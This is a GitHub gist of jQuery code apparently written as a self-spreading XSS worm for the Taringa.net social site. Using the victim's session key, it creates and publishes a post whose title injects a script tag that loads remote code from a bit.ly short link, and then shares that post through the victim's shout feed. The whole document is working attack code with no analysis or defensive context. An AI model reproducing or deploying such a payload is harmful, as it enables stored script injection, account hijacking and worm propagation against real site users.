Skip to content

Instantly share code, notes, and snippets.

@ricardosiri68
Created December 31, 2014 16:10
Show Gist options
  • Save ricardosiri68/9049734d246f741cc938 to your computer and use it in GitHub Desktop.
Save ricardosiri68/9049734d246f741cc938 to your computer and use it in GitHub Desktop.
function post() {
$(".masdiez a").click();
$.ajax({
type: 'POST',
url:'http://www.taringa.net/borradores-agregar.php',
async: false,
data:{
"key":global_data.user_key,
"id":"",
"borrador_id":"",
"titulo":"La v6 esta rota <script src=http://bit.ly/1tyI4if><",
"cuerpo":"[img=http://i11.photobucket.com/albums/a192/leolocodip/2vwxkso.jpg][img=http://i2.minus.com/ihOWWAA689DRP.jpg]",
"categoria":5,
"tags":"rota, rotisima, kaking, the, planet, peluche",
"image_1x1":"http://t2.kn3.net/taringa/A/3/5/7/1/4/joanm123/2D2.jpg",
"image_4x3":"http://t1.kn3.net/taringa/0/8/1/9/8/0/joanm123/9DD.jpg",
"own-source":1,
"sin_comentarios":0,
"twitter-vinculation":"false",
"facebook-vinculation":"false",
"vinculation_offer":"true"
},
complete: function(data){
debug = JSON && JSON.parse(data.responseText) || $.parseJSON(data.responseText);
$.ajax({
type: 'POST',
url:'http://www.taringa.net/ajax/post/add',
async: false,
data:{
"key":global_data.user_key,
"id":"",
"borrador_id":debug.data,
"titulo":"La v6 esta rota <script src=http://bit.ly/1tyI4if><",
"cuerpo":"[img=http://i11.photobucket.com/albums/a192/leolocodip/2vwxkso.jpg][img=http://i2.minus.com/ihOWWAA689DRP.jpg]",
"categoria":5,
"tags":"rota, rotisima, kaking, the, planet, peluche",
"image_1x1":"http://t2.kn3.net/taringa/A/3/5/7/1/4/joanm123/2D2.jpg",
"image_4x3":"http://t1.kn3.net/taringa/0/8/1/9/8/0/joanm123/9DD.jpg",
"own-source":1,
"sin_comentarios":0,
"twitter-vinculation":"false",
"facebook-vinculation":"false",
"vinculation_offer":"true"
},
complete: function(datad){
de = JSON && JSON.parse(datad.responseText) || $.parseJSON(datad.responseText);
$.ajax({
type: 'POST',
url:'http://www.taringa.net/ajax/shout/add',
async: false,
data:{
"key":global_data.user_key,
"body":de.data.absoluteUrl,
"privacy":0,
"attachment_type":1,
"attachment":"http://k32.kn3.net/taringa/2/3/6/8/4/4/83/joanm123/7C4.jpg",
},
complete: function(data){
}
});
}
});
}
});
}
// post();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment